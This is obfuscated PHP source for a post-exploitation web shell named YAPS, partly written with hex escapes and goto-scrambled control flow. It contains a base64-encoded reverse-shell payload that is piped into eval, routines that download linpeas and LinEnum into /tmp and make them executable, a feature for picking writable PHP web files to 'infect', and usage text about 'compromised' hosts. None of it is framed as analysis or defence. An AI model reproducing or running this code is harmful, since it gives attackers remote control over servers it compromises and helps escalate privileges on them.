" . green("[DOWNLOAD v" . str_replace("\xa", '', $newest_version) . "]: ") . $resources["updateURL"] . "\xa"; return; } echo green("[+] ") . "YAPS is already up to date (v{$version})!\xa"; return; } goto jsOgp; Wym75: function stabilize($post_socket = '') { global $s, $port, $ip; $payload = "JHNjcmlwdD1zaGVsbF9leGVjKCJ3aGljaCBzY3JpcHQiKTskcHkzPXNoZWxsX2V4ZWMoIndoaWNoIHB5dGhvbjMiKTskcHk9c2hlbGxfZXhlYygid2hpY2ggcHl0aG9uIik7aWYoc3RybGVuKCRzY3JpcHQpPjYgJiYgc3RycG9zKCRzY3JpcHQsIm5vdCBmb3VuZCIpPT1mYWxzZSkgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCAtY2kgJyIuJHNjcmlwdC4iIC1xYyAvYmluL2Jhc2ggL2Rldi9udWxsJyI7ZWxzZSBpZihzdHJsZW4oJHB5Myk+NyAmJiBzdHJwb3MoJHNjcmlwdCwibm90IGZvdW5kIik9PWZhbHNlKSAkc3RhYmlsaXplcj0kcHkzLiIgLWMgJ2ltcG9ydCBwdHk7cHR5LnNwYXduKFwiL2Jpbi9iYXNoXCIpJyI7ZWxzZSBpZihzdHJsZW4oJHB5KT42ICYmIHN0cnBvcygkc2NyaXB0LCJub3QgZm91bmQiKT09ZmFsc2UpICRzdGFiaWxpemVyPSRweS4iIC1jICdpbXBvcnQgcHR5O3B0eS5zcGF3bihcIi9iaW4vYmFzaFwiKSciO2Vsc2UgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCI7JHN0YWJpbGl6ZXI9c3RyX3JlcGxhY2UoIlxuIiwiIiwkc3RhYmlsaXplcik7JHNoZWxsPSJ1bmFtZSAtYTskc3RhYmlsaXplciI7dW1hc2soMCk7JHNvY2s9ZnNvY2tvcGVuKCJJUF9BRERSIixQT1JULCRlcnJubywkZXJyc3RyLDMwKTskc3RkPWFycmF5KCAwID0+IGFycmF5KCJwaXBlIiwiciIpLDEgPT4gYXJyYXkoInBpcGUiLCJ3IiksMiA9PiBhcnJheSgicGlwZSIsInciKSApOyRwcm9jZXNzPXByb2Nfb3Blbigkc2hlbGwsJHN0ZCwkcGlwZXMpO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoIWZlb2YoJHNvY2spKXskcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pO2lmKGluX2FycmF5KCRzb2NrLCRyZWFkX2EpKSBmd3JpdGUoJHBpcGVzWzBdLGZyZWFkKCRzb2NrLDIwNDgpKTtpZihpbl9hcnJheSgkcGlwZXNbMV0sJHJlYWRfYSkpIGZ3cml0ZSgkc29jayxmcmVhZCgkcGlwZXNbMV0sMjA0OCkpO2lmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSkgZndyaXRlKCRzb2NrLGZyZWFkKCRwaXBlc1syXSwyMDQ4KSk7fSBmY2xvc2UoJHNvY2spO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBmY2xvc2UoJHApO3Byb2NfY2xvc2UoJHByb2Nlc3MpOw=="; if (strlen($post_socket) > 1 && strlen($post_socket) > 0) { echo $post_socket; $skt = explode(":", $post_socket); $post_ip = $skt[0]; $post_port = 
$skt[1]; $final_payload = base64_encode(str_replace("IP_ADDR", $post_ip, str_replace("PORT", $post_port, base64_decode($payload)))); shell_exec("echo " . $final_payload . "| base64 -d | php -r '$stdin=file("php://stdin");eval($stdin[0]);'"); return; } fwrite($s, yellow("[i]") . " Set up a listener on another port (nc -lnvp <port>) and press ENTER.
Choose a port: "); while ($c = fread($s, 8)) { if (strlen($c) > 0) { $recv_port = (int) $c; if ($recv_port > 65535 || $recv_port == 0) { fwrite($s, red("[-]") . " Port must be between 0-65535.\xaChoose another port: "); } else { $final_payload = base64_encode(str_replace("IP_ADDR", $ip, str_replace("PORT", $recv_port, base64_decode($payload)))); fwrite($s, yellow("[i]") . " Trying to connect to {$ip}:{$recv_port}
"); if (isAvailable("popen") && isAvailable("pclose")) { pclose(popen("echo " . $final_payload . "| base64 -d | php -r '$stdin=file("php://stdin");eval($stdin[0]);' &", "r")); return; } $curl_url = $_SERVER["REQUEST_SCHEME"] . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; run_cmd("timeout --kill-after 0 1 wget --post-data="x={$ip}:{$recv_port}&stabilize=1" {$curl_url} > /dev/null"); return; } } } } goto iWGdZ; p4M3a: $ps1_color = true; goto gCfG6; iyx8E: $options = getopt($short_args, $long_args); goto k28_t; j6Lb0: function cyan($str) { global $color; return $color ? "\x1b[96m" . $str . "\33[0m" : $str; } goto x3nOo; SQe5k: function yellow($str) { global $color; return $color ? "\x1b[93m" . $str . "\33[0m" : $str; } goto j6Lb0; FlzCk: $ps1 = "[YAPS] " . str_replace(PHP_EOL, '', green(run_cmd("whoami") . "@" . run_cmd("hostname")) . ":" . cyan(run_cmd("pwd")) . "$ "); goto wu7kB; xn2Of: $port = 7359; goto p4M3a; MwOOd: if (isset($options["s"]) || isset($options["silent"])) { $silent = true; } goto zJ69L; nPG3i: if (isset($_REQUEST["stabilize"]) && $_REQUEST["stabilize"]) { $x = $_POST["x"]; stabilize($x); } else { $s = @fsockopen("tcp://{$ip}", $port); if (!$s) { die(red("[-] ") . "Couldn't connect to socket {$ip}:{$port}."); } connect(); } ?>


Original Code

<?php
 goto H2UGy; mWaAD: ini_set("\x64\145\146\x61\165\154\164\137\163\157\143\x6b\145\164\x5f\164\151\x6d\145\157\x75\164", pow(99, 6)); goto OLG_c; gCfG6: $color = true; goto p0Ngs; p0Ngs: $use_password = false; goto kemz6; iBvWV: function duplicate() { global $s, $ip, $port, $_SERVER; if (!isset($_SERVER["\x52\105\x51\x55\x45\x53\124\x5f\x53\x43\x48\105\x4d\x45"]) || !isset($_SERVER["\x48\x54\124\120\137\110\x4f\x53\124"]) || !isset($_SERVER["\x52\105\x51\x55\x45\x53\124\x5f\x55\122\111"])) { fwrite($s, yellow("\x5b\x2d\135\x20") . "\103\x6f\165\x6c\x64\x6e\47\164\40\x66\x69\x6e\144\x20\x59\101\x50\x53\40\125\122\x4c\56\40\104\151\144\40\171\x6f\165\x20\x72\x75\x6e\x20\155\x65\x20\x76\151\141\40\x63\x6f\155\x6d\141\x6e\144\x20\154\151\x6e\x65\77\12\120\154\145\141\163\145\40\160\x72\157\166\x69\144\x65\x20\164\x68\145\40\143\157\x72\162\145\143\x74\x20\x59\101\x50\x53\x20\125\122\x4c\x20\50\145\x78\141\155\x70\x6c\x65\56\143\157\x6d\x2f\x66\151\154\145\163\57\x79\x61\x70\x73\56\x70\x68\x70\51\x3a\x20"); while ($yaps_url = fread($s, 256)) { if (get_request(preg_replace("\x2f\xa\x2f", '', $yaps_url . "\x3f\x76\x72\x66\x79")) !== "\x62\141\147\165\166\151\170") { return fwrite($s, red("\133\55\135\40") . "\x43\157\165\x6c\144\x6e\47\164\40\166\141\154\x69\144\x61\144\145\x20\x59\101\x50\x53\40\125\122\x4c\56\40\x49\x73\40\x74\x68\151\x73\40\164\150\145\x20\143\157\162\162\145\x63\x74\x20\x55\x52\x4c\x3f\xa"); } break; } $curl_url = $yaps_url; } else { $curl_url = $_SERVER["\122\105\121\125\105\x53\x54\x5f\x53\x43\x48\105\115\x45"] . "\x3a\x2f\x2f" . $_SERVER["\x48\124\124\x50\137\x48\x4f\x53\x54"] . $_SERVER["\122\105\121\x55\x45\123\124\x5f\125\122\x49"]; echo $curl_url; } fwrite($s, cyan("\133\x2a\135\x20") . "\103\x68\x6f\157\x73\x65\x20\141\40\160\157\162\164\40\x74\x6f\40\x6c\151\163\164\x65\156\x20\x28\144\145\x66\x61\x75\154\164\72\40{$port}\51\x3a\x20"); while ($new_port = fread($s, 32)) { $new_port = base64_encode($new_port) == "\x43\x67\75\x3d" ? 
$port : substr($new_port, 0, -1); $socket = array("\x78" => $ip . "\x3a" . $new_port); fwrite($s, "\103\157\156\x6e\x65\x63\164\151\x6e\147\40\164\x6f\x20" . $ip . "\72" . $new_port . "\xa"); $cmd = "\x77\x67\145\164\40\55\161\117\x2d\x20\55\x2d\160\157\163\164\55\x64\141\164\x61\75\x22" . http_build_query($socket) . "\42\40{$curl_url}\x20\76\40\57\144\145\166\x2f\x6e\165\154\154"; if (isAvailable("\x70\157\160\145\156") && isAvailable("\x70\x63\x6c\157\x73\x65")) { pclose(popen($cmd . "\x20\x26", "\162")); } else { run_cmd("\164\x69\x6d\145\x6f\165\164\40\55\x2d\153\x69\x6c\x6c\55\x61\x66\164\145\162\x20\60\x20\x31\40" . $cmd); } return; } } goto rHlHg; kXDc2: ignore_user_abort(1); goto y1ZOn; Sjo8m: function random_name($name = '') { $charset = implode('', array_merge(range("\x41", "\x5a"), range("\x61", "\x7a"), range(0, 9))); for ($i = 0; $i <= mt_rand(5, 6); $i++) { $name .= $charset[mt_rand(0, strlen($charset) - 1)]; } return $name; } goto CWqQu; gn8lq: $short_args = "\165\72\x3a\150\72\x3a\163\x3a\x3a"; goto EKCVq; hZBFi: $ip = "\x31\x32\x37\x2e\60\x2e\60\x2e\x31"; goto xn2Of; CWqQu: function download($url, $saveTo) { $randomName = random_name(); $content = get_request($url); if (isAvailable("\x66\151\x6c\145\137\160\x75\x74\x5f\143\x6f\156\164\145\156\x74\x73")) { if (file_put_contents($saveTo . "\x2f" . $randomName, $content)) { return $randomName; } } if (isAvailable("\x66\x6f\x70\x65\156") && isAvailable("\146\167\x72\151\x74\x65") && isAvailable("\146\x63\x6c\157\163\145")) { $fp = fopen($saveTo . "\x2f" . $randomName, "\167"); if (fwrite($fp, $content)) { fclose($fp); return $randomName; } } return false; } goto S9wqS; H2UGy: $version = "\61\56\63\56\x31"; goto KkL02; f9SPd: function cmd_not_found($cmd) { global $s, $commands; foreach ($commands as $valid_cmd) { similar_text($cmd, $valid_cmd, $percentage); if ($percentage > 70) { fwrite($s, yellow("\x5b\x21\135\x20") . 
"\103\x6f\x6d\155\x61\156\144\x20\47\41{$cmd}\47\x20\156\x6f\x74\x20\x66\157\x75\x6e\x64\56\x20\104\x69\144\x20\171\157\165\40\x6d\145\x61\x6e\40\x27\x21" . $valid_cmd . "\47\x3f\x2e\xa"); return; } } fwrite($s, yellow("\x5b\x21\x5d\x20") . "\x43\x6f\155\155\x61\156\144\x20\x27\x21" . substr($c, 1, -1) . "\x27\x20\156\157\x74\40\x66\x6f\x75\156\144\56\x20\125\x73\145\40\41\150\x65\x6c\160\56\12"); return; } goto VcfR6; jTCyq: $silent = false; goto LrEcv; WYwps: function passwd() { global $s, $use_password; if ($use_password) { if (!check_password()) { fwrite($s, red("\133\x2d\x5d\x20") . "\x20\127\x72\157\x6e\x67\x20\x70\141\163\163\x77\x6f\x72\x64\12"); return; } fwrite($s, green("\x5b\53\x5d\40\x50\x61\163\x73\167\x6f\x72\144\x20\151\163\x20\145\x6e\141\x62\x6c\x65\x64\x2e\40") . white("\103\150\157\157\x73\x65\x20\x61\x6e\x20\157\160\x74\151\157\156\72") . "\xa\133\61\x5d\40\103\150\141\156\147\x65\40\x70\x61\163\163\167\x6f\162\144\xa\x5b\x32\x5d\40\x44\x69\x73\x61\142\154\145\x20\160\x61\x73\163\167\x6f\x72\x64\12\133\x33\135\40\103\x61\156\143\x65\154\12\76\x20"); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "\61": fwrite($s, cyan("\133\x2a\x5d\40") . "\103\150\x6f\x6f\x73\145\40\164\150\145\40\x6e\x65\167\x20\160\x61\163\x73\x77\157\x72\144\x3a\40"); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "\62": toggle_password(); return; break; default: fwrite($s, cyan("\x5b\x2a\x5d\x20") . "\103\141\156\143\145\154\145\x64\56\12"); return; break; } } } else { fwrite($s, yellow("\133\x21\x5d\x20\x50\141\163\x73\x77\157\162\144\x20\x69\163\40\144\151\163\x61\142\x6c\x65\144\x2e\x20") . white("\x43\150\x6f\157\163\145\x20\x61\x6e\x20\157\x70\164\151\x6f\156\x3a") . 
"\12\133\x31\x5d\40\123\145\164\40\141\x20\160\141\x73\x73\167\157\x72\x64\xa\133\62\x5d\40\x45\156\x61\142\x6c\x65\x20\x70\141\x73\163\x77\x6f\x72\x64\12\x5b\63\x5d\x20\103\141\x6e\x63\145\154\12\76\x20"); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "\x31": fwrite($s, cyan("\x5b\x2a\x5d\40") . "\x43\150\x6f\x6f\x73\x65\40\x74\x68\x65\40\x6e\145\167\x20\160\141\x73\163\167\x6f\x72\x64\x3a\x20"); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "\x32": toggle_password(); return; break; default: fwrite($s, cyan("\133\x2a\135\40") . "\103\141\156\x63\145\154\x65\x64\56\xa"); return; break; } } } } goto iBvWV; SqGTY: if ($auto_verify_update) { verify_update(); } goto nPG3i; S9wqS: function enum() { global $s, $resources; $downloadLinpeas = download($resources["\154\x69\x6e\160\145\141\x73"], "\x2f\164\155\x70\x2f"); $downloadLinenum = download($resources["\x6c\x69\156\145\156\165\155"], "\x2f\x74\x6d\160"); if ($downloadLinpeas) { fwrite($s, green("\x5b\53\x5d") . "\x20\114\151\156\x70\145\141\x73\x20\163\x61\166\145\x64\40\164\x6f\40\x2f\164\155\160\57" . $downloadLinpeas . cyan("\12\133\151\135\40\103\x68\x61\x6e\147\151\156\147\40\160\x65\x72\155\x69\163\163\x69\x6f\156\x73\56\x2e\x2e\12")); if (chmod("\x2f\164\155\x70\x2f" . $downloadLinpeas, 777)) { fwrite($s, green("\133\53\135") . "\40\x50\x65\x72\155\151\163\x73\151\157\x6e\x73\x20\x63\x68\141\x6e\147\145\144\x21\x20\xa\133\x69\x5d\x20\131\x6f\165\40\x63\x61\x6e\x20\x72\165\x6e\x20\151\164\40\x77\x69\x74\x68\40" . yellow("\163\x68\x20\x2f\164\x6d\x70\x2f" . $downloadLinpeas . "\40\x7c\x20\x74\x65\145\40\57\164\155\160\x2f\154\x69\156\x70\x65\141\163\x2e\x6c\157\147\xa\12")); } else { fwrite($s, yellow("\133\x21\x5d") . 
"\x20\103\x6f\x75\154\x64\156\x27\x74\40\x63\150\x61\x6e\x67\x65\40\160\x65\x72\155\151\x73\163\x69\157\156\x73\x2e\56\56\40\xa\x5b\151\135\40\106\x69\x6c\x65\x20\x77\x61\163\40\163\141\166\x65\144\x20\151\x6e\40" . yellow("\x2f\164\155\x70\57" . $downloadLinpeas . "\12\xa")); } } if ($downloadLinenum) { fwrite($s, green("\133\x2b\x5d\x20\114\x69\x6e\145\x6e\x75\155\x20\163\141\166\145\144\x20\164\157\x20\57\164\155\x70\x2f" . $downloadLinenum) . cyan("\12\133\151\135\40\103\x68\x61\156\x67\151\x6e\147\x20\160\145\x72\x6d\x69\x73\163\x69\157\x6e\x73\x2e\56\56\xa")); if (chmod("\57\x74\x6d\160\x2f" . $downloadLinenum, 777)) { fwrite($s, green("\x5b\x2b\x5d") . "\x20\120\145\x72\x6d\x69\163\x73\x69\157\x6e\x73\40\143\x68\x61\x6e\x67\145\144\41\40\xa\133\x69\x5d\x20\x59\157\165\40\x63\x61\156\x20\162\x75\x6e\x20\151\x74\40\167\x69\x74\150\x20" . yellow("\163\150\40\57\164\155\x70\x2f" . $downloadLinenum . "\40\174\x20\164\x65\x65\x20\x2f\x74\155\x70\57\154\151\156\x65\156\165\155\x2e\154\x6f\147\xa")); } else { fwrite($s, yellow("\x5b\x21\135") . "\x20\103\x6f\x75\154\x64\156\47\164\40\x63\150\x61\156\147\x65\40\160\x65\x72\x6d\151\163\x73\151\x6f\156\x73\56\x2e\56\x20\xa\x5b\x69\x5d\x20\x46\151\x6c\145\40\x77\141\163\x20\x73\141\166\x65\144\40\x69\x6e\40" . yellow("\57\x74\155\160\57" . $downloadLinenum . "\12")); } } } goto r2M4e; uIseZ: function usage() { global $banner, $version; return $banner . "\xa" . yellow("\x55\163\x61\147\145\72") . white("\12\x54\x68\145\x72\145\x20\x61\162\145\x20\164\x68\x72\x65\145\40\167\x61\171\x73\x20\171\x6f\165\x20\143\x61\156\40\x73\164\141\162\164\x20\x74\x68\x65\40\x63\157\156\156\x65\143\x74\151\x6f\156\72\xa") . green("\x31\56\x20\126\151\x61\40\143\157\x6d\155\141\156\144\40\x6c\x69\x6e\145\x20\151\156\x20\164\x68\x65\x20\x63\x6f\155\160\162\x6f\x6d\x69\x73\145\144\x20\150\157\163\x74\x3b") . 
"\12\11\x45\56\147\x3a\40\x24\x20\x70\150\160\x20\x79\x61\160\163\56\160\x68\x70\40\x5b\157\x70\x74\x69\x6f\x6e\163\135\40\133\151\160\x20\x70\157\x72\164\x7c\x69\x70\x3a\x70\157\x72\x74\x5d\xa" . green("\x32\x2e\x20\x4d\141\x6b\x69\156\147\40\x61\x20\x50\117\x53\x54\40\x72\x65\x71\165\x65\x73\x74\40\164\157\40\x74\x68\145\x20\146\151\x6c\145\x20\x77\x69\164\x68\40\x74\x68\145\x20\x70\141\x72\141\155\x65\x74\145\162\40\x22\x78\42\73") . "\12\11\105\56\x67\72\40\44\x20\143\x75\x72\154\x20\x2d\x58\40\x50\117\x53\x54\40\55\x64\x20\42\x78\x3d\x31\x39\62\x2e\61\x36\70\x2e\67\x33\56\x35\71\x3a\x37\x33\x35\x39\42\x20\x68\141\143\x6b\145\x64\x2e\143\157\x6d\57\x75\x70\x6c\157\x61\144\163\57\x79\141\160\163\x2e\x70\x68\x70\xa" . green("\x33\56\x20\115\x61\153\x69\156\147\x20\141\x20\x47\x45\x54\x20\x72\x65\x71\165\145\x73\x74\40\167\151\164\x68\x6f\165\x74\x20\x70\141\162\x61\x6d\145\x74\145\162\163\40\50\167\x69\x6c\x6c\x20\143\x6f\156\x6e\x65\x63\164\x20\164\157\40\164\x68\x65\40\150\x61\x72\144\143\157\x64\x65\144\40\x73\x6f\143\x6b\145\x74\x29\x3b") . "\xa\11\x45\56\147\x3a\x20\44\40\x63\165\x72\154\x20\150\141\x63\x6b\x65\x64\56\x63\157\155\x2f\x75\x70\x6c\157\141\144\x73\57\x79\141\x70\163\56\x70\150\x70\xa" . yellow("\x4f\x70\x74\151\157\x6e\163\x3a") . white("\12\55\150\54\40\x2d\55\x68\145\154\x70\x3a\x20\40\40\40\40\x53\150\157\167\x20\164\150\151\163\40\x68\x65\x6c\160\12\x2d\163\54\40\55\55\x73\x69\154\x65\x6e\164\x3a\40\40\x20\123\x69\x6c\145\x6e\x74\40\x6d\x6f\144\145\40\x28\144\157\145\163\40\x6e\x6f\164\40\x64\151\x73\160\x6c\x61\171\x20\x62\141\156\156\x65\x72\51\12\55\x75\54\x20\55\55\x75\160\x64\141\164\145\x3a\x20\x20\40\x43\x68\x65\143\x6b\40\151\146\40\x59\x41\120\123\x20\151\x73\x20\165\x70\x20\164\157\40\144\141\164\x65\12") . yellow("\105\x78\141\x6d\160\154\145\163\x20\50\x73\x75\160\160\x6f\x73\x65\40\x79\x6f\165\162\40\x49\x50\x20\151\x73\x20\x31\71\62\x2e\x31\x36\x38\56\67\63\56\x35\71\51\72") . 
"\12\x69\x6e\146\145\143\x74\145\144\100\x68\x6f\x73\164\72\176\x24\x20\x70\x68\x70\x20\171\141\x70\163\56\x70\150\160\40\55\163\x20\61\x39\62\56\61\66\x38\56\67\63\56\x35\71\x20\x34\64\x34\64\12\151\156\146\x65\x63\x74\145\144\100\x68\157\163\x74\72\176\44\40\160\150\160\40\x79\141\x70\163\56\160\x68\160\40\x31\71\x32\x2e\x31\66\x38\56\x37\63\x2e\65\x39\x3a\x38\x30\x38\60\xa\x79\157\165\x72\100\x6d\x61\x63\x68\151\156\x65\x3a\176\x24\40\x63\x75\162\x6c\x20\55\130\x20\120\x4f\123\124\40\55\144\x20\42\x78\x3d\x31\71\x32\56\61\x36\x38\x2e\67\x33\x2e\x35\71\42\x20\150\141\143\x6b\x65\144\x2e\x63\x6f\x6d\57\165\160\154\x6f\x61\144\x73\57\171\141\x70\163\x2e\160\x68\x70\xa"; } goto TWD7O; lGppC: function select_files() { global $s; $webdir = array("\x2f\x76\141\x72\57\x77\x77\x77\57", "\x2f\163\x72\166\x2f", "\x2f\165\163\162\57\154\x6f\143\x61\x6c\x2f\x61\160\x61\143\150\x65\x32\57", "\57\166\x61\162\57\141\160\x61\143\x68\x65\x32\57", "\x2f\x76\x61\x72\x2f\x77\x77\x77\57\156\x67\151\156\x78\55\144\x65\146\141\165\154\x74\57"); $webfiles_arr = array(); foreach ($webdir as $dir) { try { $list = getFiles($dir); $webfiles_arr = array_merge($webfiles_arr, $list); } catch (Exception $e) { } } if (count($webfiles_arr) > 0) { fwrite($s, cyan("\x5b\52\x5d\40") . white("\106\157\165\x6e\144\40" . count($webfiles_arr) . "\40\167\x72\x69\x74\x61\142\154\x65\x20\120\x48\x50\x20\146\151\154\x65\x73\x3a\12")); } for ($i = 0; $i < count($webfiles_arr); $i++) { fwrite($s, red("\x5b{$i}\135\x20") . $webfiles_arr[$i] . PHP_EOL); } fwrite($s, cyan("\12\x5b\52\x5d\40") . 
white("\103\x68\157\x6f\163\145\40\164\x68\x65\x20\x66\151\x6c\145\163\40\x79\x6f\x75\x20\x77\141\x6e\164\40\164\x6f\x20\x69\156\146\145\143\x74\56\xa\x20\40\x20\40\x53\145\x70\141\x72\141\x74\x65\40\x62\171\x20\143\x6f\155\x6d\141\x20\x28\145\56\x67\x3a\61\x2c\65\x2c\67\x2c\70\x29\40\x61\156\x64\57\157\x72\40\142\x79\40\162\141\x6e\147\145\40\x28\145\56\x67\x3a\61\x30\55\x31\66\x29\x2e\12\40\x20\40\x20\106\x69\154\145\x73\x3a\x20")); while ($data2 = fread($s, 1024)) { $files = str_replace("\40", '', substr($data2, 0, -1)); $files = explode("\x2c", $files); if (count($files) == 1 && $files[0] == '') { return; } $toInfect = array(); foreach ($files as $file) { if (preg_match("\x2f\x5e\133\x30\x2d\x39\135\x2b\x24\57", $file)) { array_push($toInfect, $file); } if (preg_match("\57\x5e\133\x30\x2d\x39\135\53\x5c\55\x5b\x30\x2d\x39\x5d\53\x24\57", $file)) { $range = explode("\x2d", $file); if ((int) $range[0] < (int) $range[1]) { for ($i = (int) $range[0]; (int) $i <= $range[1]; $i++) { array_push($toInfect, $i); } } } } sort($toInfect, SORT_NUMERIC); choose_payload($webfiles_arr, array_unique($toInfect)); return; } } goto V18g8; LrEcv: if (isset($_GET["\x76\x72\x66\x79"])) { die("\x62\141\x67\165\x76\x69\170"); } goto mBQZf; gxovs: function getPHP() { global $s; $php = ''; fwrite($s, cyan("\x5b\x2a\135") . "\40\127\162\151\x74\x65\40\171\157\165\x72\40\x50\x48\120\40\143\157\x64\145\x20\x28\52\x77\x69\164\150\x6f\165\164\52\x20\x50\x48\x50\x20\x74\x61\147\163\x29\56\40\124\157\40\163\x65\156\144\x20\x61\156\144\x20\162\x75\x6e\x20\151\x74\x2c\x20\x75\163\145\40" . green("\x21\x70\x68\160") . "\x2e\x20" . yellow("\12\133\151\135\x20\x4e\157\164\145\40\164\150\141\164\40\164\x68\151\163\40\x69\x73\40\x4e\x4f\124\40\141\156\x20\151\x6e\x74\145\162\141\143\x74\x69\166\x65\x20\120\x48\x50\x20\x73\x68\x65\154\154\x2e\x20\115\x61\x78\x20\x69\156\160\165\x74\x3a\x20\64\x30\x39\66\x20\x62\x79\x74\x65\x73\56") . 
white("\xa\160\150\x70\x3e\40")); while ($c = fread($s, 4096)) { if (substr($c, 0, -1) == "\41\x70\150\x70") { return $php; } if (substr($c, 0, -1) == "\41\143\x61\156\x63\145\x6c") { return 0; } fwrite($s, white("\x70\150\160\x3e\x20")); $php .= $c; } return $php; } goto o75dl; TwUwH: if (isset($_POST["\170"]) && strpos($_POST["\170"], "\x3a") !== false) { $skt = explode("\x3a", $_POST["\x78"]); $ip = $skt[0]; $port = $skt[1]; } goto oxSzT; efuXl: function run_cmd($c) { $c = $c . "\x20\x32\76\46\x31\12"; if (isAvailable("\145\170\145\143")) { $stdout = array(); exec($c, $stdout); $stdout = join(chr(10), $stdout) . chr(10); } else { if (isAvailable("\163\x68\145\x6c\x6c\x5f\145\x78\x65\143")) { $stdout = shell_exec($c); } else { if (isAvailable("\x70\x6f\x70\x65\156")) { $fp = popen($c, "\x72"); $stdout = NULL; if (is_resource($fp)) { while (!feof($fp)) { $stdout .= fread($fp, 1024); } } @pclose($fp); } else { if (isAvailable("\160\x61\163\x73\164\x68\162\165")) { ob_start(); passthru($c); $stdout = ob_get_contents(); ob_end_clean(); } else { if (isAvailable("\x70\x72\157\x63\137\157\160\145\x6e")) { $handle = proc_open($c, array(array("\x70\x69\x70\145", "\x72"), array("\160\x69\x70\145", "\x77"), array("\x70\151\x70\x65", "\x77")), $pipes); $stdout = NULL; while (!feof($pipes[1])) { $stdout .= fread($pipes[1], 1024); } @proc_close($handle); } else { if (isAvailable("\x73\171\163\x74\145\155")) { ob_start(); system($c); $stdout = ob_get_contents(); ob_end_clean(); } else { $stdout = 0; } } } } } } return $stdout; } goto FlzCk; CXh7h: $pass_hash = 
"\x66\60\x30\71\64\x35\70\66\60\x34\x32\64\146\x61\x36\61\64\70\145\63\x32\71\67\x37\62\x63\60\x38\x65\x37\x64\x30\65\144\67\146\x61\x62\x36\x66\66\71\141\64\x37\x32\62\x62\x34\143\x36\66\x63\61\66\64\141\x63\144\142\x30\x31\70\x65\x63\143\x30\143\142\143\x36\x32\x30\66\x30\143\143\66\x37\x65\67\141\145\71\x36\x32\x63\66\65\x61\x62\x35\71\66\x37\66\62\60\66\62\x32\143\143\61\62\x32\x30\66\x36\x32\67\x32\x32\x39\x62\x39\x34\61\60\x36\x62\x36\66\144\142\66\142\70"; goto JzPAK; ZqmNp: function check_password() { global $s, $pass_hash, $salt; fwrite($s, yellow("\x5b\151\x5d\40") . "\124\150\x69\x73\40\163\150\x65\x6c\x6c\40\x69\x73\40\x70\x72\x6f\x74\x65\143\x74\x65\x64\x2e\x20\12\x45\156\164\x65\x72\x20\164\150\145\40\160\x61\x73\x73\167\157\x72\144\x3a\40"); while ($data = fread($s, 1024)) { $entered_pass = substr($data, 0, -1); return hash("\x73\150\141\65\61\62", $salt . hash("\x73\150\141\65\x31\x32", $entered_pass, false), false) == $pass_hash ? true : false; } } goto ssUNI; JzPAK: $auto_verify_update = false; goto jTCyq; y1ZOn: ini_set("\x6d\x61\x78\137\145\x78\145\143\x75\164\x69\157\156\x5f\x74\151\x6d\145", 0); goto mWaAD; OLG_c: $resources = array("\154\x69\x6e\160\145\x61\x73" => "\150\164\164\x70\163\x3a\57\57\x72\141\x77\56\147\151\x74\x68\165\x62\165\x73\x65\x72\143\157\x6e\164\x65\156\164\56\143\x6f\155\x2f\143\x61\162\154\x6f\x73\160\x6f\154\157\x70\57\x70\x72\151\166\151\x6c\x65\147\145\x2d\145\163\x63\141\x6c\141\x74\x69\157\x6e\x2d\141\x77\145\x73\x6f\155\x65\x2d\x73\143\x72\x69\x70\164\163\55\163\x75\151\x74\145\57\x6d\x61\163\164\145\162\x2f\x6c\151\156\x50\105\101\123\57\x6c\151\x6e\x70\145\x61\163\x2e\x73\x68", "\x6c\x69\x6e\145\x6e\x75\155" => "\150\164\x74\160\163\72\x2f\x2f\162\141\x77\x2e\x67\x69\164\150\x75\142\165\163\145\x72\x63\157\156\164\x65\156\164\x2e\143\x6f\x6d\57\162\x65\142\x6f\x6f\164\x75\163\145\x72\x2f\114\x69\x6e\x45\156\x75\x6d\x2f\155\x61\x73\x74\145\162\57\114\x69\x6e\x45\x6e\165\x6d\56\x73\150", 
"\163\165\x67\147\145\x73\164\x65\162" => "\150\x74\164\x70\163\72\x2f\x2f\x72\x61\167\56\147\x69\x74\x68\165\142\165\163\x65\162\x63\157\x6e\x74\x65\156\x74\x2e\143\x6f\155\57\x6d\172\x65\164\x2d\x2f\x6c\151\156\x75\x78\x2d\x65\170\x70\154\x6f\151\x74\x2d\x73\165\147\147\x65\163\x74\145\x72\x2f\x6d\x61\163\164\145\x72\x2f\x6c\151\156\165\x78\x2d\145\170\160\x6c\x6f\x69\x74\x2d\x73\165\147\147\x65\x73\x74\145\x72\x2e\163\x68", "\166\145\162\x69\146\x79\125\160\x64\141\x74\145\125\122\x4c" => "\150\164\164\x70\163\72\57\57\x72\141\x77\x2e\x67\x69\164\150\165\142\x75\163\x65\162\x63\157\x6e\x74\x65\x6e\164\x2e\x63\157\155\57\x4e\151\143\x6b\147\x75\151\164\x61\162\x2f\131\x41\120\x53\x2f\x6d\141\151\x6e\57\x76\x65\x72\x73\151\157\x6e", "\165\x70\x64\141\x74\x65\x55\x52\x4c" => "\150\164\x74\160\163\x3a\57\57\162\x61\167\56\147\151\164\x68\x75\142\165\x73\145\162\x63\x6f\x6e\x74\145\x6e\164\x2e\143\157\155\57\116\x69\143\153\x67\165\151\x74\x61\162\57\131\x41\x50\x53\x2f\155\141\151\156\x2f\171\x61\x70\x73\56\160\150\x70"); goto hZBFi; wu7kB: function sysinfo() { global $s; fwrite($s, green("\xa\75\75\75\75\75\75\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\x3d\40\111\156\x69\164\151\141\x6c\x20\x69\156\x66\x6f\x20\x3d\x3d\75\x3d\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\75\x3d\75\75\75\75\x3d\x3d\12\xa")); $info = cyan("\133\x69\x5d\x20\117\123\40\x69\156\146\x6f\72\xa") . 